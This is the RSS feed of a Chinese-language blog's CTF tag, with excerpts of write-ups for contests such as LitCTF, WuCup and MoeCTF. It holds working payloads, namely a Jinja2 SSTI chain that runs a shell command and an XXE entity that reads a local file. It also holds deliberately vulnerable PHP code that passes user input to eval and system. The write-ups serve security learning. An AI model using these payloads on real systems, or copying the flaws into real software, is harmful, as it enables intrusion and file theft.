<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>Ctf on HYH&#39;s Blog</title>
    <link>https://www.hyhforever.top/tags/ctf/</link>
    <description>Recent content in Ctf on HYH&#39;s Blog</description>
    <image>
      <title>HYH&#39;s Blog</title>
      <url>https://www.hyhforever.top/background.jpg</url>
      <link>https://www.hyhforever.top/background.jpg</link>
    </image>
    <generator>Hugo</generator>
    <language>zh</language>
    <lastBuildDate>Mon, 26 May 2025 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://www.hyhforever.top/tags/ctf/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>LitCTF-2025</title>
      <link>https://www.hyhforever.top/posts/2025/05/litctf-2025/</link>
      <pubDate>Mon, 26 May 2025 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2025/05/litctf-2025/</guid>
      <description>&lt;h1 id=&#34;litctf2025&#34;&gt;LITCTF2025&lt;/h1&gt;
&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h3 id=&#34;星愿信箱&#34;&gt;星愿信箱&lt;/h3&gt;
&lt;p&gt;经过测试是SSTI，可以通过设置变量绕过黑名单&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code class=&#34;language-jinja2&#34; data-lang=&#34;jinja2&#34;&gt;{% set os = (lipsum | attr(&amp;#39;__globals__&amp;#39;)) | attr(&amp;#39;get&amp;#39;)(&amp;#39;os&amp;#39;) %}
{% set popen = os | attr(&amp;#39;popen&amp;#39;) %}
{% set input_cmd = &amp;#34;head /flag&amp;#34; %}
{% set cmd = popen(input_cmd).read() %}
{% print cmd %}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2025/05/litctf-2025/images/image-20250525203547160.png&#34; data-caption=&#34;image-20250525203547160&#34;&gt;
&lt;img alt=&#34;image-20250525203547160&#34; loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2025/05/litctf-2025/images/image-20250525203547160.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;nest_js&#34;&gt;nest_js&lt;/h3&gt;
&lt;p&gt;弱密码，登录就有&lt;code&gt;flag&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>WuCup-2024</title>
      <link>https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/</link>
      <pubDate>Sun, 01 Dec 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/</guid>
      <description>&lt;h2 id=&#34;web&#34;&gt;Web&lt;/h2&gt;
&lt;h3 id=&#34;sign&#34;&gt;Sign&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;题目介绍:&lt;/strong&gt; POST浅浅签个到吧&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/12/%E5%90%BE%E6%9D%AF-2024/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;hellohacker&#34;&gt;HelloHacker&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;题目介绍:&lt;/strong&gt; 你看到的不一定是真的&lt;/p&gt;
&lt;p&gt;源码如下&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?php
highlight_file(__FILE__);
error_reporting(0);
include_once &amp;#39;check.php&amp;#39;;
include_once &amp;#39;ban.php&amp;#39;;

$incompetent = $_POST[&amp;#39;incompetent&amp;#39;];
$WuCup = $_POST[&amp;#39;WuCup&amp;#39;];

if ($incompetent !== &amp;#39;HelloHacker&amp;#39;) {
    die(&amp;#39;Come invade!&amp;#39;);
}

$required_chars = [&amp;#39;p&amp;#39;, &amp;#39;e&amp;#39;, &amp;#39;v&amp;#39;, &amp;#39;a&amp;#39;, &amp;#39;n&amp;#39;, &amp;#39;x&amp;#39;, &amp;#39;r&amp;#39;, &amp;#39;o&amp;#39;, &amp;#39;z&amp;#39;];
$is_valid = true;

if (!checkRequiredChars($WuCup, $required_chars)) {
    $is_valid = false;
}

if ($is_valid) {

    $prohibited_file = &amp;#39;prohibited.txt&amp;#39;;
    if (file_exists($prohibited_file)) {
        $file = fopen($prohibited_file, &amp;#39;r&amp;#39;);
        
while ($line = fgets($file)) {
    $line = rtrim($line, &amp;#34;\r\n&amp;#34;);  
    if ($line === &amp;#39;&amp;#39; &amp;amp;&amp;amp; strpos($WuCup, &amp;#39; &amp;#39;) === false) {
      
        continue;
    }
    if (stripos($WuCup, $line) !== false) {
        fclose($file);  
        die(&amp;#39;this road is blocked&amp;#39;);
    }
}
  fclose($file);  
    }

    eval($WuCup);
} else {
    die(&amp;#39;NO！NO！NO！&amp;#39;);
}

?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;简单分析一下，post的参数中&lt;code&gt;incompetent&lt;/code&gt;是&lt;code&gt;HelloHacker&lt;/code&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>极客大挑战2024</title>
      <link>https://www.hyhforever.top/posts/2024/10/geekchallenge2024/</link>
      <pubDate>Thu, 31 Oct 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/10/geekchallenge2024/</guid>
      <description>&lt;h2 id=&#34;100的&#34;&gt;100%的⚪&lt;/h2&gt;
&lt;p&gt;F12审计源码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-22.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-22.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Base64解密&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-23.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-23.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;baby_upload&#34;&gt;baby_upload&lt;/h2&gt;
&lt;p&gt;%00截断，属于nginx解析问题，会把file.ext当作php文件解析&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-24.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-24.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-25.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-25.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;ez_http&#34;&gt;ez_http&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-26.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-26.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-27.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/10/geekchallenge2024/images/image-27.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>MoeCTF 2024</title>
      <link>https://www.hyhforever.top/posts/2024/08/moectf-2024/</link>
      <pubDate>Tue, 13 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/08/moectf-2024/</guid>
      <description>&lt;p&gt;一年一度的MoeCTF又来了，不过我好久没打过CTF了，前段时间一直在搞开发。&lt;/p&gt;
&lt;h2 id=&#34;web&#34;&gt;WEB&lt;/h2&gt;
&lt;h3 id=&#34;弗拉格之地的入口&#34;&gt;&lt;strong&gt;弗拉格之地的入口&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;直接进入 &lt;strong&gt;/robots.tx&lt;/strong&gt;t 发现 /webtutorEntry.php文件，进入即可拿到flag&lt;/p&gt;</description>
    </item>
    <item>
      <title>LitCTF 2024</title>
      <link>https://www.hyhforever.top/posts/2024/06/litctf-2024/</link>
      <pubDate>Sat, 01 Jun 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/06/litctf-2024/</guid>
      <description>&lt;h2 id=&#34;web&#34;&gt;WEB&lt;/h2&gt;
&lt;h3 id=&#34;exx&#34;&gt;exx&lt;/h3&gt;
&lt;p&gt;这个标题以及整个界面，在NSS里面是做到过原题的，整体思路就是XXE&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?xml version=&amp;#34;1.0&amp;#34; ?&amp;gt;
&amp;lt;!DOCTYPE note [
&amp;lt;!ENTITY hyh SYSTEM &amp;#34;file:///flag&amp;#34;&amp;gt;
]&amp;gt;
&amp;lt;user&amp;gt;
&amp;lt;username&amp;gt;&amp;amp;hyh;&amp;lt;/username&amp;gt;
&amp;lt;password&amp;gt;123456&amp;lt;/password&amp;gt;
&amp;lt;/user&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;然后发包即可&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-1.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-1.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;sas---serializing-authentication-system&#34;&gt;SAS - Serializing Authentication System&lt;/h3&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-3.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2024/06/litctf-2024/images/image-3.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;base64加密之后传入参数即可&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTFshow-原谅杯</title>
      <link>https://www.hyhforever.top/posts/2024/03/ctfshow-forgive-cup/</link>
      <pubDate>Sat, 23 Mar 2024 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2024/03/ctfshow-forgive-cup/</guid>
      <description>&lt;p&gt;&lt;em&gt;前言&lt;/em&gt; ：练习题目，康复训练&lt;/p&gt;
&lt;hr&gt;
&lt;h2 id=&#34;原谅4&#34;&gt;原谅4&lt;/h2&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt; &amp;lt;?php isset($_GET[&amp;#39;xbx&amp;#39;])?system($_GET[&amp;#39;xbx&amp;#39;]):highlight_file(__FILE__); 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;题目给了这一段代码，但是经过测试，只有ls、rm、sh这三个命令能用&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/wp-content/uploads/2024/03/1711164713-image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/wp-content/uploads/2024/03/1711164713-image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;flag在根目录，没有直接读取文件的命令&lt;/p&gt;
&lt;p&gt;但是这个sh命令是可以执行文件中的命令的，类似于下图&lt;/p&gt;</description>
    </item>
    <item>
      <title>Pwn练习题</title>
      <link>https://www.hyhforever.top/posts/2023/12/pwn-practice/</link>
      <pubDate>Tue, 05 Dec 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/12/pwn-practice/</guid>
      <description>&lt;p&gt;题目来源于NSSCTF网站&lt;/p&gt;
&lt;h2 id=&#34;ret2text&#34;&gt;ret2text&lt;/h2&gt;
&lt;h3 id=&#34;swpuctf-2021-新生赛gift_pwn&#34;&gt;[SWPUCTF 2021 新生赛]gift_pwn&lt;/h3&gt;
&lt;p&gt;先放到虚拟机里checksec一下，能看到开启NX，没有PIE，64位&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/wp-content/uploads/2023/12/1701694411-image.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/wp-content/uploads/2023/12/1701694411-image.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;放进64位的IDA反编译一下，可以看到在gift函数里留了后门&lt;/p&gt;</description>
    </item>
    <item>
      <title>极客大挑战2023</title>
      <link>https://www.hyhforever.top/posts/2023/11/geekchallenge2023/</link>
      <pubDate>Thu, 02 Nov 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/11/geekchallenge2023/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;strong&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;本校的极客大挑战还是要参加的，去年就很遗憾，今年得好好打一下，这次我会把能写的全写在博客里，同时也会学习一下其他的方向&lt;/p&gt;
&lt;p&gt;组队的队友是外校大三的网工学长，很强的选手！&lt;/p&gt;</description>
    </item>
    <item>
      <title>0xGame 2023</title>
      <link>https://www.hyhforever.top/posts/2023/10/0xgame-2023/</link>
      <pubDate>Sat, 07 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/10/0xgame-2023/</guid>
      <description>&lt;h2 id=&#34;week1&#34;&gt;WEEK1&lt;/h2&gt;
&lt;h3 id=&#34;signin&#34;&gt;signin&lt;/h3&gt;
&lt;p&gt;进去只有一个页面&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-26.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-26.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;源代码里没有东西，扫描后台也没有东西&lt;/p&gt;
&lt;p&gt;放进火狐浏览器，F12进入调试器&lt;/p&gt;
&lt;p&gt;在源码里发现flag&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-27.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/10/0xgame-2023/images/image-27.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h3 id=&#34;baby_php&#34;&gt;baby_php&lt;/h3&gt;
&lt;p&gt;源码如下&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt; &amp;lt;?php
// flag in flag.php
highlight_file(__FILE__);

if (isset($_GET[&amp;#39;a&amp;#39;]) &amp;amp;&amp;amp; isset($_GET[&amp;#39;b&amp;#39;]) &amp;amp;&amp;amp; isset($_POST[&amp;#39;c&amp;#39;]) &amp;amp;&amp;amp; isset($_COOKIE[&amp;#39;name&amp;#39;])) {
    $a = $_GET[&amp;#39;a&amp;#39;];
    $b = $_GET[&amp;#39;b&amp;#39;];
    $c = $_POST[&amp;#39;c&amp;#39;];
    $name = $_COOKIE[&amp;#39;name&amp;#39;];

    if ($a != $b &amp;amp;&amp;amp; md5($a) == md5($b)) {
        if (!is_numeric($c) &amp;amp;&amp;amp; $c != 1024 &amp;amp;&amp;amp; intval($c) == 1024) {
            include($name.&amp;#39;.php&amp;#39;);
        }
    }
}
?&amp;gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;首先是a和b的MD5弱比较&lt;/p&gt;</description>
    </item>
    <item>
      <title>SHCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/10/shctf-2023/</link>
      <pubDate>Mon, 02 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/10/shctf-2023/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/h2&gt;
&lt;p&gt;写完week1感觉还是比较简单的，很基础&lt;/p&gt;
&lt;p&gt;也是放假在家不想打游戏，拿这个消磨一下时间&lt;/p&gt;
&lt;h2 id=&#34;week1&#34;&gt;WEEK1&lt;/h2&gt;
&lt;h3 id=&#34;babyrce&#34;&gt;babyRCE&lt;/h3&gt;
&lt;p&gt;题目源码&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?php

$rce = $_GET[&amp;#39;rce&amp;#39;];
if (isset($rce)) {
    if (!preg_match(&amp;#34;/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\&amp;gt;|\&amp;lt;|\&amp;#39;|\&amp;#34;/i&amp;#34;, $rce)) {
        system($rce);
    }else {
            echo &amp;#34;hhhhhhacker!!!&amp;#34;.&amp;#34;\n&amp;#34;;
    }
} else {
    highlight_file(__FILE__);
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;过滤了部分命令和特殊符号&lt;/p&gt;</description>
    </item>
    <item>
      <title>NewStarCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/09/newstarctf-2023/</link>
      <pubDate>Thu, 28 Sep 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/09/newstarctf-2023/</guid>
      <description>&lt;h2 id=&#34;week1&#34;&gt;Week1&lt;/h2&gt;
&lt;h3 id=&#34;泄漏的秘密&#34;&gt;泄漏的秘密&lt;/h3&gt;
&lt;p&gt;hint：粗心的网站管理员总会泄漏一些敏感信息在Web根目录下&lt;/p&gt;
&lt;p&gt;访问该网站目录下的robots.txt可以找到第一部分的flag&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/09/newstarctf-2023/images/image-6.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/09/newstarctf-2023/images/image-6.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;扫描一下后台，发现www.zip备份文件，将其下载下来，在index.php中发现第二部分flag&lt;/p&gt;</description>
    </item>
    <item>
      <title>MoeCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/08/moectf-2023/</link>
      <pubDate>Tue, 15 Aug 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/08/moectf-2023/</guid>
      <description>&lt;h2 id=&#34;前言&#34;&gt;&lt;strong&gt;&lt;em&gt;前言&lt;/em&gt;&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;好久没玩CTF了，玩玩MoeCTF，就当是温故知新&lt;/p&gt;
&lt;p&gt;西电的这个终端看起来好高级的样子&lt;/p&gt;
&lt;p&gt;之前还没用过这种，长见识了&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/08/moectf-2023/images/image-22.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/08/moectf-2023/images/image-22.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;h1 id=&#34;web&#34;&gt;WEB&lt;/h1&gt;
&lt;h2 id=&#34;web入门指北&#34;&gt;Web入门指北&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;DESCRIPTION: 解码获取flag&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTFshow-月饼杯&amp;吃瓜杯</title>
      <link>https://www.hyhforever.top/posts/2023/06/ctfshow-%E6%9C%88%E9%A5%BC%E6%9D%AF%E5%90%83%E7%93%9C%E6%9D%AF/</link>
      <pubDate>Sun, 25 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/ctfshow-%E6%9C%88%E9%A5%BC%E6%9D%AF%E5%90%83%E7%93%9C%E6%9D%AF/</guid>
      <description>&lt;p&gt;日常练习题 题目来源：&lt;a href=&#34;https://ctf.show/&#34;&gt;ctf.show&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&#34;月饼杯&#34;&gt;月饼杯&lt;/h2&gt;
&lt;h3 id=&#34;web1_此月圆&#34;&gt;Web1_此月圆&lt;/h3&gt;
&lt;p&gt;题目附件中有的index.php&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;&amp;lt;?php
class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this-&amp;gt;uname=$uname;
		$this-&amp;gt;password=$password;
	}
	public function __wakeup()
	{
			if($this-&amp;gt;password===&amp;#39;yu22x&amp;#39;)
			{
				include(&amp;#39;flag.php&amp;#39;);
				echo $flag;	
			}
			else
			{
				echo &amp;#39;wrong password&amp;#39;;
			}
		}
	}
function filter($string){
    return str_replace(&amp;#39;Firebasky&amp;#39;,&amp;#39;Firebaskyup&amp;#39;,$string);
}
$uname=$_GET[1];
$password=1;
$ser=filter(serialize(new a($uname,$password)));
$test=unserialize($ser);
?&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;这里只能GET传入一个名为1的变量，password是已经设置好为1的&lt;/p&gt;</description>
    </item>
    <item>
      <title>HNCTF-2022</title>
      <link>https://www.hyhforever.top/posts/2023/06/hnctf-2022/</link>
      <pubDate>Sat, 17 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/hnctf-2022/</guid>
      <description>&lt;h1 id=&#34;week1&#34;&gt;week1&lt;/h1&gt;
&lt;h2 id=&#34;2048&#34;&gt;2048&lt;/h2&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-56.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-56.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;一个2048小游戏，先看看源码&lt;/p&gt;
&lt;p&gt;在源码中看到游戏的js文件&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-57.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-57.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;找找看有没有flag&lt;/p&gt;
&lt;p&gt;找到这一段代码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-58.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/hnctf-2022/images/image-58.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;原来要超过20000分才弹出flag，这里直接把代码放到控制台运行，弹出flag&lt;/p&gt;</description>
    </item>
    <item>
      <title>LitCTF-2023</title>
      <link>https://www.hyhforever.top/posts/2023/06/litctf-2023/</link>
      <pubDate>Sat, 17 Jun 2023 00:00:00 +0000</pubDate>
      <guid>https://www.hyhforever.top/posts/2023/06/litctf-2023/</guid>
      <description>&lt;h2 id=&#34;我flag呢&#34;&gt;我flag呢？&lt;/h2&gt;
&lt;p&gt;进去之后页面是这样&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-30.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-30.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;先看看网页源码呢&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-31.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-31.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在注释里拿到flag&lt;/p&gt;
&lt;p&gt;源码里也有一段彩蛋&lt;/p&gt;
&lt;h2 id=&#34;导弹迷踪&#34;&gt;&lt;strong&gt;导弹迷踪&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;进去之后好像是一个小游戏&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-32.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-32.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;先审查一下源码&lt;/p&gt;
&lt;p&gt;&lt;a data-fancybox=&#34;gallery&#34; href=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-33.png&#34; data-caption=&#34;&#34;&gt;
&lt;img loading=&#34;lazy&#34; src=&#34;https://www.hyhforever.top/posts/2023/06/litctf-2023/images/image-33.png&#34;&gt;
&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;在最下面看到Game files&lt;/p&gt;</description>
    </item>
  </channel>
</rss>
